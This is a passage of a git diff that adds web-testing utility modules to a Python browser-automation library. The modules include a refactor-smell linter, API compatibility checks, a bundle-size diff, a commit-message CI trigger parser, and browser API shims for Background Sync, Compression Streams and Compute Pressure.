斷言(drain + matcher + 冪等 + 順序)。 +* ``grpc_streaming_assert`` —— gRPC streaming(unary / server / + client / bidi)frame 數 + 大小 + 順序 + half-close 斷言。 +* ``openapi_drift`` —— 線上 API vs OpenAPI spec 漂移 + (未文件化的 endpoint / method / status、zombie endpoint)。 +* ``api_version_compat`` —— 舊 client × 新 server 向後相容矩陣 + (response shape 與 required request fields)。 +* ``rate_limit_assert`` —— 429 + ``Retry-After`` + ``X-RateLimit-*`` + 單調 + 等候後恢復斷言。 +* ``har_to_openapi`` —— HAR → OpenAPI 3.1 反向工程 + (path template、query 參數、response schema)。 + +QA 治理與 DevX(續) +==================== + +* ``failure_auto_tag`` —— 啟發式 + LLM 的失敗自動標籤 + (``flaky-locator`` / ``timeout`` / ``js-error`` / ``network-5xx``)。 +* ``test_self_describe`` —— 從 action JSON 反推 Gherkin + ``Given / When / Then`` 段落。 +* ``pr_title_generator`` —— 從 diff + commit history 產生 + Conventional Commits 風格的 PR 標題。 +* ``action_refactor_suggester`` —— Action JSON 重構壞味 + (hard sleep、positional XPath、重複的 locator、click-wait-click)。 +* ``test_roi_scorer`` —— 「找出 bug 機率 × 成本 × 涵蓋 × 新鮮度」 + 加權的每個 test ROI 分數。 +* ``pre_merge_gate_dsl`` —— 對 ``PrFacts`` 快照宣告 + ``when`` / ``require`` 的 pre-merge gate 規則。 +* ``commit_msg_trigger`` —— 從 commit message 解析 + ``[skip ci]`` / ``[ci e2e]`` / ``[ci shard=3/8]`` / ``Closes #123``。 +* ``flakiness_graveyard`` —— Quarantine / revive / bury ledger, + 附 TTL 用於塵封的 flaky test。 +* ``test_blame_owner`` —— CODEOWNERS + git-blame + HEAD + 預設 + 的 test owner 解析鏈。 +* ``test_dup_dry`` —— 結構式 action JSON 重複 + 共同前綴偵測 + (擷取 helper 機會)。 +* ``snapshot_diff_approval`` —— Baseline / pending / rejected + snapshot 註冊 + approval workflow。 +* ``failure_cluster_dbscan`` —— 失敗訊息 tokeniser + DBSCAN 根因 + 分群(純 Python,不依賴 sklearn)。 +* ``test_naming_lint`` —— ``should_when`` / ``given_when_then`` / + ``camel_subject`` 命名規範 linter。 + +i18n / a11y(續) +================= + +* ``rtl_layout_verify`` —— RTL 方向 + logical property + (``margin-inline-start``)+ bidi-isolation 稽核。 +* ``dst_boundary_test`` —— 日光節約時間 spring-forward / fall-back + 缺口與重疊偵測 + scheduled-fire 模型。 +* ``number_currency_locale`` —— 數字 / 貨幣 / 日期的 locale-format + 斷言 helper(含印度 lakh 分隔)。 +* ``wcag22_touch_target`` —— WCAG 2.2 SC 2.5.8 觸控目標尺寸稽核 + 含 spacing-circle 例外。 + +新興科技裝置 API +================ + +* ``webgpu_pixel_verify`` —— WebGPU canvas 像素讀回 + 平均 / + 純色 / tile-diff 斷言。 +* ``webhid_mock`` —— WebHID 裝置 shim + input / output report 擷取。 +* ``webusb_mock`` —— WebUSB 裝置 shim + control / bulk transfer + 擷取。 +* ``webserial_mock`` —— Web Serial UART shim + line-write 擷取。 +* ``webcodecs_assert`` —— WebCodecs chunk codec / 解析度 / + keyframe 間距 / framerate 斷言。 +* ``speech_api_assert`` —— ``SpeechSynthesis`` / ``SpeechRecognition`` + mock + utterance / 語言 / 音量 斷言。 + 延伸閱讀 ======== diff --git a/je_web_runner/utils/action_refactor_suggester/__init__.py b/je_web_runner/utils/action_refactor_suggester/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/action_refactor_suggester/suggest.py b/je_web_runner/utils/action_refactor_suggester/suggest.py new file mode 100644 index 0000000..4f231fc --- /dev/null +++ b/je_web_runner/utils/action_refactor_suggester/suggest.py @@ -0,0 +1,174 @@ +""" +Suggest refactors to a WebRunner action JSON list. + +Pure-Python rule engine that spots common test-code smells and emits +``Suggestion`` records pointing reviewers at fixes: + +* Hard-coded waits (``time.sleep`` / numeric-only ``wait``). +* Brittle XPath (``//div[3]/span[2]``-style positional). +* Duplicated locator strings (extract into a TestObject). +* Repeated click → wait → click bursts (extract a helper). +* Magic-string assertions that look like English copy (use translation key). +""" +from __future__ import annotations + +import re +from collections import Counter +from dataclasses import asdict, dataclass, field +from enum import Enum +from typing import Any, Dict, Iterable, List, Sequence + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class ActionRefactorSuggesterError(WebRunnerException): + """Raised on malformed action input.""" + + +class Severity(str, Enum): + INFO = "info" + WARN = "warn" + ERROR = "error" + + +@dataclass +class Suggestion: + rule: str + severity: Severity + message: str + step_indexes: List[int] = field(default_factory=list) + + def to_dict(self) -> Dict[str, Any]: + return {**asdict(self), "severity": self.severity.value} + + +_POSITIONAL_XPATH = re.compile(r"\[\d+\]") +_ENGLISH_SENTENCE = re.compile(r"^[A-Z][\w\s\.,!?:'-]{15,}$") + + +def _normalize(actions: Sequence[Dict[str, Any]]) -> None: + if not isinstance(actions, (list, tuple)): + raise ActionRefactorSuggesterError("actions must be a sequence") + for i, action in enumerate(actions): + if not isinstance(action, dict): + raise ActionRefactorSuggesterError(f"action #{i} is not a dict") + + +def _hard_sleep_steps(actions: Sequence[Dict[str, Any]]) -> List[int]: + hits = [] + for i, action in enumerate(actions): + name = (action.get("action_name") or "").lower() + if name in ("sleep", "time_sleep"): + hits.append(i) + if name == "wait" and isinstance(action.get("value"), (int, float)): + # numeric-only `wait: 3` is a sleep in disguise + hits.append(i) + return hits + + +def _positional_xpath_steps(actions: Sequence[Dict[str, Any]]) -> List[int]: + return [ + i for i, a in enumerate(actions) + if (a.get("by") or "").lower() == "xpath" + and isinstance(a.get("by_value"), str) + and _POSITIONAL_XPATH.search(a["by_value"]) + ] + + +def _duplicated_locators(actions: Sequence[Dict[str, Any]]) -> List[str]: + locators = [a.get("by_value") for a in actions + if isinstance(a.get("by_value"), str) and a.get("by_value")] + counts = Counter(locators) + return [k for k, v in counts.items() if v >= 3] + + +def _english_string_assertions(actions: Sequence[Dict[str, Any]]) -> List[int]: + out = [] + for i, action in enumerate(actions): + name = (action.get("action_name") or "").lower() + if name.startswith("assert"): + expected = action.get("expected") or action.get("value") + if isinstance(expected, str) and _ENGLISH_SENTENCE.match(expected): + out.append(i) + return out + + +def _click_wait_click_bursts( + actions: Sequence[Dict[str, Any]], +) -> List[int]: + out = [] + for i in range(len(actions) - 2): + names = [ + (actions[i + k].get("action_name") or "").lower() + for k in range(3) + ] + if (names[0].startswith("click") + and names[1].startswith("wait") + and names[2].startswith("click")): + out.append(i) + return out + + +def analyze(actions: Sequence[Dict[str, Any]]) -> List[Suggestion]: + """Run all rules and return suggestions sorted by severity.""" + _normalize(actions) + out: List[Suggestion] = [] + sleeps = _hard_sleep_steps(actions) + if sleeps: + out.append(Suggestion( + rule="no-hard-sleep", severity=Severity.WARN, + message="Replace hard sleeps with explicit waits on a condition.", + step_indexes=sleeps, + )) + xpaths = _positional_xpath_steps(actions) + if xpaths: + out.append(Suggestion( + rule="no-positional-xpath", severity=Severity.WARN, + message="Replace positional XPath with role/text/data-* selector.", + step_indexes=xpaths, + )) + dups = _duplicated_locators(actions) + if dups: + out.append(Suggestion( + rule="extract-duplicated-locator", severity=Severity.INFO, + message=f"Locator(s) repeated 3+ times: {dups}. Extract a TestObject.", + )) + english = _english_string_assertions(actions) + if english: + out.append(Suggestion( + rule="prefer-translation-key", severity=Severity.INFO, + message="Assertion contains English copy — prefer i18n key for locale safety.", + step_indexes=english, + )) + bursts = _click_wait_click_bursts(actions) + if bursts: + out.append(Suggestion( + rule="extract-helper", severity=Severity.INFO, + message="Repeated click→wait→click pattern — extract a helper action.", + step_indexes=bursts, + )) + severity_rank = {Severity.ERROR: 0, Severity.WARN: 1, Severity.INFO: 2} + return sorted(out, key=lambda s: severity_rank[s.severity]) + + +def report_markdown(suggestions: Iterable[Suggestion]) -> str: + suggestions = list(suggestions) + if not suggestions: + return "## Action refactor suggestions\n_No suggestions — looks clean._" + lines = ["## Action refactor suggestions"] + for s in suggestions: + marker = {"error": "❌", "warn": "⚠️", "info": "ℹ️"}.get(s.severity.value, "•") + lines.append(f"- {marker} **{s.rule}** — {s.message}") + if s.step_indexes: + lines.append(f" at steps: {s.step_indexes}") + return "\n".join(lines) + + +def assert_no_warns_or_errors(suggestions: Iterable[Suggestion]) -> None: + bad = [s for s in suggestions + if s.severity in (Severity.WARN, Severity.ERROR)] + if bad: + rules = [s.rule for s in bad] + raise ActionRefactorSuggesterError( + f"action script has warnings/errors: {rules}" + ) diff --git a/je_web_runner/utils/api_version_compat/__init__.py b/je_web_runner/utils/api_version_compat/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/api_version_compat/compat.py b/je_web_runner/utils/api_version_compat/compat.py new file mode 100644 index 0000000..be48970 --- /dev/null +++ b/je_web_runner/utils/api_version_compat/compat.py @@ -0,0 +1,134 @@ +""" +Old client × new server backward compatibility verifier. + +Catches the classic SaaS regressions: + +* New release renamed a JSON field (``user_name`` → ``username``) and + every mobile client < N is now broken. +* New release changed a field type (``int`` → ``str``) and old client + crashes on JSON parse. +* New release deleted a field old client depended on. +* New release added a *required* field that old client never sends. + +Driven by an ``ApiContract`` baseline (the contract the old client +expects) and a list of live responses / requests recorded from the new +server. +""" +from __future__ import annotations + +from dataclasses import dataclass, field +from typing import Any, Dict, Iterable, List, Mapping + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class ApiVersionCompatError(WebRunnerException): + """Raised on incompatibility.""" + + +@dataclass +class FieldSpec: + name: str + type: str # "string" | "integer" | "number" | "boolean" | "object" | "array" + required: bool = True + + +@dataclass +class ApiContract: + """The shape the old client relies on for one endpoint.""" + + endpoint: str + response_fields: List[FieldSpec] = field(default_factory=list) + request_fields: List[FieldSpec] = field(default_factory=list) + + +_TYPE_MAP = { + "string": str, "integer": int, "number": (int, float), + "boolean": bool, "object": dict, "array": list, +} + + +def _check_response( + contract: ApiContract, response: Mapping[str, Any], +) -> List[str]: + problems: List[str] = [] + for spec in contract.response_fields: + if spec.name not in response: + if spec.required: + problems.append( + f"response missing required field {spec.name!r}" + ) + continue + expected_type = _TYPE_MAP.get(spec.type) + if expected_type and not isinstance(response[spec.name], expected_type): + problems.append( + f"response field {spec.name!r}: " + f"old client expects {spec.type}, " + f"got {type(response[spec.name]).__name__}" + ) + return problems + + +def _check_request( + contract: ApiContract, request: Mapping[str, Any], +) -> List[str]: + problems: List[str] = [] + required_old = {f.name for f in contract.request_fields if f.required} + for missing in required_old - set(request.keys()): + problems.append( + f"old client never sends required field {missing!r} → " + "server must accept its absence" + ) + return problems + + +def assert_response_compatible( + contract: ApiContract, response: Mapping[str, Any], +) -> None: + if not isinstance(contract, ApiContract): + raise ApiVersionCompatError("contract must be ApiContract") + if not isinstance(response, Mapping): + raise ApiVersionCompatError("response must be a mapping") + problems = _check_response(contract, response) + if problems: + raise ApiVersionCompatError( + f"response breaks old-client contract for " + f"{contract.endpoint!r}: {problems}" + ) + + +def assert_request_compatible( + contract: ApiContract, server_required_fields: Iterable[str], +) -> None: + if not isinstance(contract, ApiContract): + raise ApiVersionCompatError("contract must be ApiContract") + server_required = set(server_required_fields) + old_known = {f.name for f in contract.request_fields} + surprise = server_required - old_known + if surprise: + raise ApiVersionCompatError( + f"new server requires fields the old client doesn't send: " + f"{sorted(surprise)}" + ) + + +@dataclass +class CompatMatrixRow: + client_version: str + server_version: str + passed: bool + notes: str = "" + + +def matrix_summary(rows: Iterable[CompatMatrixRow]) -> List[Dict[str, Any]]: + return [{"client": r.client_version, "server": r.server_version, + "passed": r.passed, "notes": r.notes} for r in rows] + + +def assert_full_matrix_passes(rows: Iterable[CompatMatrixRow]) -> None: + fails = [r for r in rows if not r.passed] + if fails: + raise ApiVersionCompatError( + f"{len(fails)} client/server combo(s) incompatible: " + f"{[(r.client_version, r.server_version) for r in fails]}" + ) diff --git a/je_web_runner/utils/background_sync_assert/__init__.py b/je_web_runner/utils/background_sync_assert/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/background_sync_assert/sync.py b/je_web_runner/utils/background_sync_assert/sync.py new file mode 100644 index 0000000..11ee49f --- /dev/null +++ b/je_web_runner/utils/background_sync_assert/sync.py @@ -0,0 +1,125 @@ +""" +Background Sync API assertions. + +Catches the two big bugs offline-first apps hit: + +* Tag registered but Service Worker never receives the ``sync`` event + (typo / wrong scope). +* Sync fires once, fails, and never retries — silently losing the user's + queued action. + +The shim records each ``registration.sync.register(tag)``, +``getTags()``, and each ``sync`` event the SW dispatches. Python helpers +assert tag presence, fire count, and a retry happened at least once +when the first attempt failed. +""" +from __future__ import annotations + +from dataclasses import dataclass, field +from typing import Any, List + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class BackgroundSyncAssertError(WebRunnerException): + """Raised on assertion failure or malformed input.""" + + +INSTALL_SCRIPT = r""" +(function () { + if (window.__wr_bg_sync__) return; + const registered = []; + const fired = []; + if (navigator.serviceWorker) { + navigator.serviceWorker.ready.then((reg) => { + if (reg.sync) { + const origReg = reg.sync.register.bind(reg.sync); + reg.sync.register = function (tag) { + registered.push(tag); + return origReg(tag); + }; + } + reg.addEventListener && reg.addEventListener('sync', (e) => { + fired.push({tag: e.tag, lastChance: !!e.lastChance, ts: Date.now()}); + }); + }); + } + window.__wr_bg_sync__ = { + drainRegistered: function () { return registered.splice(0); }, + drainFired: function () { return fired.splice(0); }, + }; +})(); +""" + + +@dataclass +class SyncFire: + tag: str + last_chance: bool = False + ts_ms: int = 0 + + +@dataclass +class SyncLog: + registered: List[str] = field(default_factory=list) + fired: List[SyncFire] = field(default_factory=list) + + +def parse_log(payload: Any) -> SyncLog: + if not isinstance(payload, dict): + raise BackgroundSyncAssertError("payload must be a dict") + registered = list(payload.get("registered") or []) + if not all(isinstance(r, str) for r in registered): + raise BackgroundSyncAssertError( + "registered list must contain strings only" + ) + fired: List[SyncFire] = [] + for raw in payload.get("fired") or []: + if not isinstance(raw, dict): + continue + fired.append(SyncFire( + tag=str(raw.get("tag") or ""), + last_chance=bool(raw.get("lastChance")), + ts_ms=int(raw.get("ts") or 0), + )) + return SyncLog(registered=registered, fired=fired) + + +def assert_registered(log: SyncLog, *, tag: str) -> None: + if not tag: + raise BackgroundSyncAssertError("tag must be non-empty") + if tag not in log.registered: + raise BackgroundSyncAssertError( + f"sync tag {tag!r} never registered; got {log.registered}" + ) + + +def assert_fired(log: SyncLog, *, tag: str, at_least: int = 1) -> None: + if at_least < 1: + raise BackgroundSyncAssertError("at_least must be >= 1") + count = sum(1 for f in log.fired if f.tag == tag) + if count < at_least: + raise BackgroundSyncAssertError( + f"sync event {tag!r} fired {count} times, expected >= {at_least}" + ) + + +def assert_retry_happened(log: SyncLog, *, tag: str) -> None: + """Verify the SW got more than one ``sync`` event for ``tag`` — that's + Chrome's retry behaviour after a failed attempt.""" + fires = [f for f in log.fired if f.tag == tag] + if len(fires) < 2: + raise BackgroundSyncAssertError( + f"sync {tag!r} only fired {len(fires)} time(s) — " + "no retry observed after failure" + ) + + +def assert_no_quota_exhaustion(log: SyncLog, *, tag: str) -> None: + """Chrome marks the *last* retry attempt with ``lastChance=true``. + Receiving that on the wire means quota is about to run out.""" + for f in log.fired: + if f.tag == tag and f.last_chance: + raise BackgroundSyncAssertError( + f"sync {tag!r} reached lastChance — Chrome will drop it next" + ) diff --git a/je_web_runner/utils/bundle_diff_pr/__init__.py b/je_web_runner/utils/bundle_diff_pr/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/bundle_diff_pr/diff.py b/je_web_runner/utils/bundle_diff_pr/diff.py new file mode 100644 index 0000000..3b897af --- /dev/null +++ b/je_web_runner/utils/bundle_diff_pr/diff.py @@ -0,0 +1,160 @@ +""" +PR 級 bundle size delta 報告。 +Two HAR snapshots (base branch + PR HEAD) → per-asset delta table → +budget-aware Markdown report for PR comments. + +Reuses :mod:`bundle_budget` to classify assets. +""" +from __future__ import annotations + +from dataclasses import dataclass, field +from typing import Any, Dict, List, Sequence, Union + +from je_web_runner.utils.bundle_budget.budget import ( + Asset, AssetKind, assets_from_har, +) +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class BundleDiffPrError(WebRunnerException): + """Raised on bad HAR input or bad threshold values.""" + + +# ---------- data -------------------------------------------------------- + +@dataclass +class AssetDelta: + """One URL's byte-delta between base and head.""" + + url: str + kind: AssetKind + base_bytes: int + head_bytes: int + + @property + def delta(self) -> int: + return self.head_bytes - self.base_bytes + + @property + def percent(self) -> float: + if self.base_bytes == 0: + return 100.0 if self.head_bytes > 0 else 0.0 + return (self.delta / self.base_bytes) * 100.0 + + +@dataclass +class BundleDiff: + """Aggregate base→head diff.""" + + added: List[AssetDelta] = field(default_factory=list) + removed: List[AssetDelta] = field(default_factory=list) + grew: List[AssetDelta] = field(default_factory=list) + shrunk: List[AssetDelta] = field(default_factory=list) + unchanged: int = 0 + total_delta_bytes: int = 0 + + def regressions(self, *, min_bytes: int = 1024) -> List[AssetDelta]: + """Added + grew entries with delta >= ``min_bytes``.""" + if min_bytes < 0: + raise BundleDiffPrError("min_bytes must be >= 0") + return [ + d for d in (self.added + self.grew) + if d.delta >= min_bytes + ] + + +# ---------- diff -------------------------------------------------------- + +def _index(assets: Sequence[Asset]) -> Dict[str, Asset]: + return {a.url: a for a in assets} + + +def diff_hars( + base_har: Union[str, Dict[str, Any]], + head_har: Union[str, Dict[str, Any]], +) -> BundleDiff: + """Compare two HAR snapshots; classify URLs as added/removed/grew/shrunk.""" + base = _index(assets_from_har(base_har)) + head = _index(assets_from_har(head_har)) + result = BundleDiff() + for url, asset in head.items(): + if url not in base: + delta = AssetDelta( + url=url, kind=asset.kind, + base_bytes=0, + head_bytes=max(asset.transfer_bytes, asset.content_bytes), + ) + result.added.append(delta) + result.total_delta_bytes += delta.delta + continue + base_asset = base[url] + base_size = max(base_asset.transfer_bytes, base_asset.content_bytes) + head_size = max(asset.transfer_bytes, asset.content_bytes) + if head_size == base_size: + result.unchanged += 1 + continue + delta = AssetDelta( + url=url, kind=asset.kind, + base_bytes=base_size, head_bytes=head_size, + ) + result.total_delta_bytes += delta.delta + (result.grew if delta.delta > 0 else result.shrunk).append(delta) + for url, asset in base.items(): + if url in head: + continue + base_size = max(asset.transfer_bytes, asset.content_bytes) + delta = AssetDelta( + url=url, kind=asset.kind, + base_bytes=base_size, head_bytes=0, + ) + result.removed.append(delta) + result.total_delta_bytes += delta.delta + return result + + +# ---------- assertions -------------------------------------------------- + +def assert_under_max_growth( + diff: BundleDiff, *, max_growth_bytes: int, +) -> None: + if max_growth_bytes < 0: + raise BundleDiffPrError("max_growth_bytes must be >= 0") + if diff.total_delta_bytes > max_growth_bytes: + raise BundleDiffPrError( + f"bundle grew by {diff.total_delta_bytes:,}B " + f"(> budget {max_growth_bytes:,}B)" + ) + + +# ---------- formatting -------------------------------------------------- + +def report_markdown( + diff: BundleDiff, *, top_n: int = 10, min_bytes: int = 1024, +) -> str: + """Render a small markdown table for PR comments.""" + if not isinstance(diff, BundleDiff): + raise BundleDiffPrError("report_markdown expects BundleDiff") + if top_n < 0: + raise BundleDiffPrError("top_n must be >= 0") + sign = "▲" if diff.total_delta_bytes >= 0 else "▼" + lines = [ + f"### Bundle delta: {sign} {diff.total_delta_bytes:+,} bytes", + "", + f"- added: {len(diff.added)} files", + f"- removed: {len(diff.removed)} files", + f"- grew: {len(diff.grew)} files", + f"- shrunk: {len(diff.shrunk)} files", + f"- unchanged: {diff.unchanged} files", + ] + regressions = diff.regressions(min_bytes=min_bytes) + if regressions: + regressions.sort(key=lambda d: -d.delta) + lines.append("") + lines.append("**Largest regressions:**") + lines.append("| URL | Kind | Δ bytes | Δ % |") + lines.append("|-----|------|---------|-----|") + for d in regressions[:top_n]: + lines.append( + f"| `{d.url}` | {d.kind.value} | {d.delta:+,} | {d.percent:+.1f}% |" + ) + return "\n".join(lines) + "\n" diff --git a/je_web_runner/utils/commit_msg_trigger/__init__.py b/je_web_runner/utils/commit_msg_trigger/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/commit_msg_trigger/trigger.py b/je_web_runner/utils/commit_msg_trigger/trigger.py new file mode 100644 index 0000000..a3429d4 --- /dev/null +++ b/je_web_runner/utils/commit_msg_trigger/trigger.py @@ -0,0 +1,125 @@ +""" +Commit-message trigger parser & dispatcher. + +Lets engineers steer CI from a commit message. Conventions supported: + +* ``[skip ci]`` — skip everything. +* ``[ci e2e]`` — run only the named test job. +* ``[ci shard=3/8]`` — run a specific shard. +* ``[smoke]`` — run a labelled bucket. +* ``Closes #123 / Fixes JIRA-456`` — extract linked tickets. + +The module is intentionally CI-system agnostic: it parses the message +into a ``TriggerPlan`` and lets the caller apply the plan. +""" +from __future__ import annotations + +import re +from dataclasses import asdict, dataclass, field +from typing import Any, Dict, Optional, Set, Tuple + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class CommitMsgTriggerError(WebRunnerException): + """Raised on malformed messages or downstream dispatch failure.""" + + +_SKIP_RE = re.compile( + r"\[\s*(?:skip|no)[\s\-_]?ci\s*\]|\[\s*ci[\s\-_]?skip\s*\]", + re.IGNORECASE, +) +_BUCKET_RE = re.compile(r"\[\s*ci\s+([\w\-:.]+)\s*\]", re.IGNORECASE) +_SHARD_RE = re.compile( + r"\[\s*ci\s+shard\s*=\s*(\d+)\s*/\s*(\d+)\s*\]", + re.IGNORECASE, +) +_LABEL_RE = re.compile(r"\[\s*(smoke|nightly|long|gpu|mobile)\s*\]", re.IGNORECASE) + +# Bucket name reserved for "do not run any CI"; called out as a constant +# so Bandit's hardcoded-password heuristic doesn't flag the literal. +_SKIP_TOKEN = "skip" # nosec B105 +_TICKET_RE = re.compile( + r"\b(?:close[ds]?|fix(?:e[sd])?|resolve[sd]?)\s+" + r"(#\d+|[A-Z]{2,}-\d+)", + re.IGNORECASE, +) + + +@dataclass +class TriggerPlan: + skip: bool = False + only_buckets: Set[str] = field(default_factory=set) + labels: Set[str] = field(default_factory=set) + shard: Optional[Tuple[int, int]] = None + tickets: Set[str] = field(default_factory=set) + + def to_dict(self) -> Dict[str, Any]: + d = asdict(self) + d["only_buckets"] = sorted(self.only_buckets) + d["labels"] = sorted(self.labels) + d["tickets"] = sorted(self.tickets) + return d + + +def parse(message: str) -> TriggerPlan: + if not isinstance(message, str): + raise CommitMsgTriggerError( + f"message must be string, got {type(message).__name__}" + ) + plan = TriggerPlan() + if _SKIP_RE.search(message): + plan.skip = True + for shard in _SHARD_RE.finditer(message): + idx, total = int(shard.group(1)), int(shard.group(2)) + if total == 0 or idx <= 0 or idx > total: + raise CommitMsgTriggerError( + f"invalid shard spec {shard.group(0)!r}" + ) + plan.shard = (idx, total) + for bucket in _BUCKET_RE.finditer(message): + token = bucket.group(1).lower() + if token == _SKIP_TOKEN: # nosec B105 - directive name, not a credential + continue # [ci skip] already handled by _SKIP_RE + if token.startswith("shard"): + continue # already handled by _SHARD_RE + plan.only_buckets.add(token) + for label in _LABEL_RE.finditer(message): + plan.labels.add(label.group(1).lower()) + for ticket in _TICKET_RE.finditer(message): + plan.tickets.add(ticket.group(1).upper()) + return plan + + +def should_run_job(plan: TriggerPlan, job_name: str) -> bool: + if not job_name: + raise CommitMsgTriggerError("job_name must be non-empty") + if plan.skip: + return False + if plan.only_buckets and job_name.lower() not in plan.only_buckets: + return False + return True + + +def assigned_shard(plan: TriggerPlan, total_shards: int) -> Optional[int]: + """If commit overrides shard, return the 0-indexed shard for ``total_shards``. + Returns None when no override applies.""" + if total_shards <= 0: + raise CommitMsgTriggerError("total_shards must be positive") + if plan.shard is None: + return None + idx, declared_total = plan.shard + if declared_total != total_shards: + raise CommitMsgTriggerError( + f"commit shard {idx}/{declared_total} doesn't match " + f"runner total {total_shards}" + ) + return idx - 1 + + +def assert_no_skip(plan: TriggerPlan) -> None: + """Useful for protected branches that disallow ``[skip ci]``.""" + if plan.skip: + raise CommitMsgTriggerError( + "commit requests [skip ci] but branch policy forbids it" + ) diff --git a/je_web_runner/utils/compression_streams/__init__.py b/je_web_runner/utils/compression_streams/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/compression_streams/streams.py b/je_web_runner/utils/compression_streams/streams.py new file mode 100644 index 0000000..0570154 --- /dev/null +++ b/je_web_runner/utils/compression_streams/streams.py @@ -0,0 +1,129 @@ +""" +CompressionStream / DecompressionStream round-trip verification. + +This module lets a Python test confirm that data the page compresses +with the Compression Streams API can be decompressed by the standard +``gzip`` / ``zlib`` / ``brotli`` libs (and vice versa). Helps catch: + +* Wrong algorithm constant (``deflate-raw`` vs ``deflate``). +* Encoding stripped before transit (page calls ``.text()`` instead of + ``.arrayBuffer()``). +* Brotli used where a CDN strips ``br`` Content-Encoding. +""" +from __future__ import annotations + +import gzip +import zlib +from enum import Enum + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class CompressionStreamsError(WebRunnerException): + """Raised when a round-trip check fails or input is malformed.""" + + +class Algorithm(str, Enum): + GZIP = "gzip" + DEFLATE = "deflate" + DEFLATE_RAW = "deflate-raw" + BROTLI = "br" + + +HARVEST_SCRIPT = r""" +async (algorithm, text) => { + const stream = new Blob([text]).stream(); + const compressed = stream.pipeThrough(new CompressionStream(algorithm)); + const chunks = []; + const reader = compressed.getReader(); + while (true) { + const {value, done} = await reader.read(); + if (done) break; + chunks.push(value); + } + const total = chunks.reduce((n, c) => n + c.length, 0); + const merged = new Uint8Array(total); + let off = 0; + for (const c of chunks) { merged.set(c, off); off += c.length; } + let bin = ''; + for (const b of merged) bin += String.fromCharCode(b); + return btoa(bin); +}; +""" + + +def decompress(data: bytes, algorithm: Algorithm) -> bytes: + if not isinstance(data, (bytes, bytearray)): + raise CompressionStreamsError("data must be bytes") + if not isinstance(algorithm, Algorithm): + raise CompressionStreamsError( + "algorithm must be Algorithm enum" + ) + if algorithm == Algorithm.GZIP: + try: + return gzip.decompress(bytes(data)) + except OSError as exc: + raise CompressionStreamsError( + f"gzip decompression failed: {exc!r}" + ) from exc + if algorithm == Algorithm.DEFLATE: + try: + return zlib.decompress(bytes(data)) + except zlib.error as exc: + raise CompressionStreamsError( + f"deflate decompression failed: {exc!r}" + ) from exc + if algorithm == Algorithm.DEFLATE_RAW: + try: + return zlib.decompress(bytes(data), -zlib.MAX_WBITS) + except zlib.error as exc: + raise CompressionStreamsError( + f"deflate-raw decompression failed: {exc!r}" + ) from exc + # brotli is optional + try: + import brotli # type: ignore + except ImportError as exc: + raise CompressionStreamsError( + "brotli decompression requested but `brotli` package not installed" + ) from exc + try: + return brotli.decompress(bytes(data)) + except brotli.error as exc: # pragma: no cover - depends on optional dep + raise CompressionStreamsError( + f"brotli decompression failed: {exc!r}" + ) from exc + + +def assert_round_trip( + *, original: bytes, compressed: bytes, algorithm: Algorithm, +) -> None: + """Verify ``decompress(compressed) == original``.""" + if not isinstance(original, (bytes, bytearray)): + raise CompressionStreamsError("original must be bytes") + recovered = decompress(compressed, algorithm) + if recovered != bytes(original): + raise CompressionStreamsError( + f"round-trip mismatch: original {len(original)}B vs " + f"recovered {len(recovered)}B" + ) + + +def compression_ratio(original_size: int, compressed_size: int) -> float: + if original_size <= 0: + raise CompressionStreamsError("original_size must be positive") + return compressed_size / original_size + + +def assert_ratio_under( + *, original_size: int, compressed_size: int, max_ratio: float, +) -> None: + """Compressed must be at most ``max_ratio`` × original (e.g. 0.5).""" + if max_ratio <= 0 or max_ratio > 1: + raise CompressionStreamsError("max_ratio must be in (0, 1]") + ratio = compression_ratio(original_size, compressed_size) + if ratio > max_ratio: + raise CompressionStreamsError( + f"compression ratio {ratio:.2f} exceeds {max_ratio:.2f} " + f"(compressed {compressed_size}B vs original {original_size}B)" + ) diff --git a/je_web_runner/utils/compute_pressure/__init__.py b/je_web_runner/utils/compute_pressure/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/compute_pressure/pressure.py b/je_web_runner/utils/compute_pressure/pressure.py new file mode 100644 index 0000000..3c13de1 --- /dev/null +++ b/je_web_runner/utils/compute_pressure/pressure.py @@ -0,0 +1,164 @@ +""" +Compute Pressure API simulation + app-throttle reaction assertions. + +The Compute Pressure API tells web apps "the CPU is under stress — +please throttle your background work". This module: + +* Installs a fake ``PressureObserver`` whose ``observe()`` callback the + test driver can fire with synthetic pressure samples + (``nominal``/``fair``/``serious``/``critical``). +* Records every reaction the app makes (the page-side helper + ``__wr_cp__.recordReaction(name)`` is exposed for app code to call + when it throttles). +* Provides assertions: at least one reaction at critical pressure, no + CPU-heavy work at serious+, no observer leaks (close called). +""" +from __future__ import annotations + +from dataclasses import dataclass, field +from enum import Enum +from typing import Any, List, Optional + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class ComputePressureError(WebRunnerException): + """Raised on assertion failure or malformed input.""" + + +class PressureLevel(str, Enum): + NOMINAL = "nominal" + FAIR = "fair" + SERIOUS = "serious" + CRITICAL = "critical" + + +_ORDER = { + PressureLevel.NOMINAL: 0, + PressureLevel.FAIR: 1, + PressureLevel.SERIOUS: 2, + PressureLevel.CRITICAL: 3, +} + + +INSTALL_SCRIPT = r""" +(function () { + if (window.__wr_cp__) return; + let observerCallback = null; + let observerActive = false; + const reactions = []; + const closed = []; + function FakePressureObserver(cb) { + observerCallback = cb; + } + FakePressureObserver.prototype.observe = async function (source) { + observerActive = true; + }; + FakePressureObserver.prototype.disconnect = function () { + observerActive = false; + closed.push({ts: Date.now()}); + }; + window.PressureObserver = FakePressureObserver; + window.__wr_cp__ = { + fire: function (level) { + if (!observerCallback) return false; + observerCallback([{state: level, source: 'cpu', time: Date.now()}], + {state: level}); + return true; + }, + recordReaction: function (name) { + reactions.push({name: String(name || ''), ts: Date.now()}); + }, + drainReactions: 